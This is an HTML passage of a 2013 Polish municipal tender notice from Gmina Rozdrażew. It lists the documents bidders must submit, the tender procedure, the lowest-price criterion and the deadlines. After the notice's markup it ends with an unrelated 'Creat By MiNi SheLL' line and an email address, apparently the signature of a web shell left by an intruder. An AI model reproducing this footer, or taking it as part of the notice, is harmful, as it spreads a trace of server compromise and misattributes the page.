<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rozdrazew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rozdrażew ul. Rynek 3, 63-708 Rozdrażew pokój nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2013 godzina 09:30, miejsce: Urząd Gminy Rozdrażew ul. Rynek 3, 63-708 Rozdrażew pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com